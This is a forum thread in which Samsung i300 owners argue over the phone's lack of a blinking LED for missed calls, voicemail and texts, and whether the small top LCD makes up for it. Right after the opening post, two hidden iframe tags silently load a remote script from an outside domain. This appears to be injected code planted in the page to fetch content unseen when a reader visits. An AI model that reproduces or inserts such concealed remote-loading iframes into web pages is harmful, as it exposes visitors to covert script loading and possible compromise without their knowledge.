+ Reply to Thread

LED not lighting up on missed calls

Does anyone know if there is a setting somewhere or something that allows this. I sometimes leave my I-300 on my desk or in the cradle when I go to talk to someone or something and get a call. When I come back I have no way of knowing a call has come in unless I turn on the screen. Any thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Believe it or not, this is normal. Samsung designed it that way, much to every one's disgust.

Can you believe I woke up this morning and my I300 had not picked up my dry cleaning?

True, it is normal. False, I don't think everyone should be disgusted by it. I would love the convenience of not turning the display on as with my previous Samsung. My other Samsung didn't have the same screen issues as this. So, it would be nice but no biggie. Whats so hard about hitting the button a couple of times anyway?

There is nothing "hard" about hitting a button but the whole idea behind the thing is convenience and some of this is removed by my having to manually check the phone everytime I come back to my desk. Add to this the fact that the notifications of voice mails sometimes don't come for several hours and the convience factor is lower then it should be (although I still LOVE the phone and have no plans to get rid of it.)

I agree whole heartedly with what you just said. I am plagued with the obcession of checking for calls. Feel like I'm in pubert again!

[i] Whats so hard about hitting the button a couple of times anyway? [/B]
    I agree this is no biggy, but it anoyes me too. I get distracted, sidetracked, etc. I'd like a little reminder if I have missed a call, v/m or text message. I hope PDAApps can work up some sort of hack for this. PDAApps, are you listening?
    Carl

If you guys are so strict about not wanting to turn on the screen just to see if you missed a call, then, by all means, do realize that the small top LCD screen that samsung DID build into the phone is meant for purposes such as what you describe...being able to see if someone had called whiel you were away from the phone without having to turn on the lcd. i recall reading posts on here before about people complaining how samsung didnt allow the led light to flash when a voicemail is waiting, etc., but i personally would be confused trying to interpret different led flash rates, and much rather prefer the LCD screen on top of the phone!

Good point!

Originally posted by Stillen_I30
    If you guys are so strict about not wanting to turn on the screen just to see if you missed a call, then, by all means, do realize that the small top LCD screen that samsung DID build into the phone is meant for purposes such as what you describe...being able to see if someone had called whiel you were away from the phone without having to turn on the lcd. i recall reading posts on here before about people complaining how samsung didnt allow the led light to flash when a voicemail is waiting, etc., but i personally would be confused trying to interpret different led flash rates, and much rather prefer the LCD screen on top of the phone!
    That's not the point though - the red-lcd doesn't have to signal WHAT the event is, it just has to notify the user when ANY event requiring his attention happens - wheather it be a text page, voicemail, missed call, or whatever else.

-mark

Administrator

Arrow

i aggree with stillen_i300..

with that little screen on top its a breeze to just look at it.. it will tell you all you need to know versus having to decipher a led status... yeah im used to the led blinking or something, but those cellphones had no top mounted display like the i300 does...

..you cant have everything@!

Marc:
    You usually get everthing right, but not this time.
    A Personal Digital Assistant should TELL YOU you have missed something, you should not have to ask it. If you had an admin assistant, wouldn't you want her (ooppss, no sexism intended) to TELL you you have missed a call. You shouldn't have to ask your assistant, "hey, did I miss any calls while I was away from my phone". Like any good assistant, the i300 should tell you and remind you you have missed a call/message, etc. I stand by my comment that this is a GLARING ommission by Samsung. If you tell me it was designed that way, I say, the engineer who "designed" that non feature, has never used a smart phone.
    Carl

Administrator

Arrow

the enginner may not have used a smartphone... i would not doubt it!

we have all gotten used to seeing the blinking "idiot light" on cellphones and went to see why it was blinking.., but to just simply glance at the top display to see if theres anything i need to know does not sound too silly...

we are all different here, but i keep my phone within easy reach... i dont sit behind a desk all day like some of you do, im always out and about, so , say i left my phone in the car while i stepped out for a few minutes, once i get back in it just takes me a sec to lift up the sanyo flap and visually look at the top screen.. if i see voicemail, i know its a VM waiting for me, if i see "missed call" or see a number left by someone who i have in my addy book comes up, i know right then what i have.. to me thats a GOOD, efficient assistant.. i think the old assistants who just "beeped" and flashed a light (l.e.d.) at me were not worth the salary i paid them , now that i have a display that tells me what i need to know by simply looking at it!

this may be the new trend...

just think... in a few years, all pdas may be acting that way and you might see someone with an old phone that still does the "blinking light/beep" thing (like something made by audiovox! [private joke to those who get it] ), and you will say, "geesh.. his pda/assistant is old.. look.. his l.e.d.'s still blink! what primitive technology!!

sorry so long....

...which leaves us with, "It would have been nice, but oh well." Though I get tired of checking to see if I missed a call, it would require more time, and battery power, to turn on the screen and determine what had been missed. You may decide you don't even care that you missed the "event."

Looking at the LCD takes a mere moment, requires no addt'l battery usage, and tells you immediately what you missed.

Marc/mj:
    Oh well, I guess we can do is agree to disagree. When comparing a phone like the i3oo to other we have had, you are right, you take the good with the bad and move on. There are 2 big plusses that my i300 has over any other phone/pda I have had. (including my 6035) First it works in my house better than any other phone I have had and I can use the Mochasoft telnet emulator to dial up every system I need to support. Those 2 features far outweight the small annoyances I have. I guess you can tell that overall, I am very happy with the performance and utility of the i300. With my extended batteries I can't even complain about battery life anymore. I guess we all have to complain about something.... so the lack of a "message alert" is my thing to complain about. ....... I'll shut up now and see if someone can write me a hack.
    Carl